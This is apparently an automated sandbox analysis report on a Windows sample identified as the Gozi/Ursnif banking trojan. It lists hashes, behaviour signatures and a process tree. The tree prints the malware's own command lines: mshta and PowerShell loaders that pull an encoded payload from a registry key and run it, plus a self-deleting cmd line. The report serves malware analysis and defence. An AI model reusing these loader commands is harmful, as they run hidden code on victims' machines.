Analysis

  • max time kernel
    129s
  • max time network
    71s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    27-06-2020 05:32

General

  • Target

    SecuriteInfo.com.Win32.Kryptik.HEME.26904.exe

  • Size

    346KB

  • MD5

    f577fbb7280758f98ad523a7b580d818

  • SHA1

    0c3262702dfec0ab6c305ab5126ee72b44eece07

  • SHA256

    00bd4de4ad3ccb503cb3e46030055454905d2a4033c03a462fd755af96edab27

  • SHA512

    d7d49d21710cf43050b9caa339462b63b20fb6419b129e37ad1e5b6c1675ab2bb33c70957dff612df9b47506d5c7b0f6f387f37c8377dfe294a713c7bff7a5ad

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 85 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetWindowsHookEx 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Deletes itself 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Checks whether UAC is enabled 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

  • Suspicious use of WriteProcessMemory 50 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: MapViewOfSection
    PID:1276
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Kryptik.HEME.26904.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Kryptik.HEME.26904.exe"
      2⤵
        PID:1124
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CAF07543-A1A9-8CB6-7B9E-6580DFB269B4\\\Clicring'));if(!window.flag)close()</script>"
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CAF07543-A1A9-8CB6-7B9E-6580DFB269B4").comsclen))
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: MapViewOfSection
          PID:656
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wipuyylg\wipuyylg.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES64DA.tmp" "c:\Users\Admin\AppData\Local\Temp\wipuyylg\CSC5F351E5616E4BE7861BDF1C6AC5BE76.TMP"
              5⤵
                PID:1080
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\giocxs2h\giocxs2h.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1928
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6547.tmp" "c:\Users\Admin\AppData\Local\Temp\giocxs2h\CSC559B2555E0FF4BA8BA3C277DE53AD50.TMP"
                5⤵
                  PID:2000
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Kryptik.HEME.26904.exe"
            2⤵
            • Deletes itself
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            • Suspicious behavior: MapViewOfSection
            PID:1592
            • C:\Windows\system32\PING.EXE
              ping localhost -n 5
              3⤵
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Runs ping.exe
              PID:1828
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          • Checks whether UAC is enabled
          • Suspicious use of WriteProcessMemory
          • Suspicious use of FindShellTrayWindow
          PID:108
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:108 CREDAT:275457 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            • Checks whether UAC is enabled
            PID:1516
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:108 CREDAT:668677 /prefetch:2
            2⤵
              PID:1568
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            1⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            • Checks whether UAC is enabled
            • Suspicious use of WriteProcessMemory
            • Suspicious use of FindShellTrayWindow
            PID:1900
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:275457 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              • Checks whether UAC is enabled
              PID:1944
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            1⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            • Checks whether UAC is enabled
            • Suspicious use of WriteProcessMemory
            • Suspicious use of FindShellTrayWindow
            PID:1508
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1508 CREDAT:275457 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              • Checks whether UAC is enabled
              PID:1388
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1508 CREDAT:4076548 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              • Checks whether UAC is enabled
              PID:540

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\j8hu3ld\imagestore.dat

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\j8hu3ld\imagestore.dat

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\j8hu3ld\imagestore.dat

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D5Z3PYL2\favicon[1].ico

          • C:\Users\Admin\AppData\Local\Temp\RES64DA.tmp

          • C:\Users\Admin\AppData\Local\Temp\RES6547.tmp

          • C:\Users\Admin\AppData\Local\Temp\giocxs2h\giocxs2h.dll

          • C:\Users\Admin\AppData\Local\Temp\wipuyylg\wipuyylg.dll

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CS7J22CN.txt

          • \??\c:\Users\Admin\AppData\Local\Temp\giocxs2h\CSC559B2555E0FF4BA8BA3C277DE53AD50.TMP

          • \??\c:\Users\Admin\AppData\Local\Temp\giocxs2h\giocxs2h.0.cs

          • \??\c:\Users\Admin\AppData\Local\Temp\giocxs2h\giocxs2h.cmdline

          • \??\c:\Users\Admin\AppData\Local\Temp\wipuyylg\CSC5F351E5616E4BE7861BDF1C6AC5BE76.TMP

          • \??\c:\Users\Admin\AppData\Local\Temp\wipuyylg\wipuyylg.0.cs

          • \??\c:\Users\Admin\AppData\Local\Temp\wipuyylg\wipuyylg.cmdline

          • memory/540-9-0x0000000000000000-mapping.dmp

          • memory/656-13-0x0000000000000000-mapping.dmp

          • memory/1080-17-0x0000000000000000-mapping.dmp

          • memory/1124-0-0x0000000001C79000-0x0000000001C7A000-memory.dmp

            Filesize

            4KB

          • memory/1124-1-0x0000000001D60000-0x0000000001D71000-memory.dmp

            Filesize

            68KB

          • memory/1388-6-0x0000000000000000-mapping.dmp

          • memory/1388-12-0x0000000006A30000-0x0000000006A53000-memory.dmp

            Filesize

            140KB

          • memory/1476-14-0x0000000000000000-mapping.dmp

          • memory/1516-3-0x00000000068E0000-0x0000000006903000-memory.dmp

            Filesize

            140KB

          • memory/1516-2-0x0000000000000000-mapping.dmp

          • memory/1592-28-0x0000000000000000-mapping.dmp

          • memory/1592-29-0x000007FFFFFDF000-mapping.dmp

          • memory/1828-30-0x0000000000000000-mapping.dmp

          • memory/1828-31-0x000007FFFFFD6000-mapping.dmp

          • memory/1928-21-0x0000000000000000-mapping.dmp

          • memory/1944-4-0x0000000000000000-mapping.dmp

          • memory/2000-24-0x0000000000000000-mapping.dmp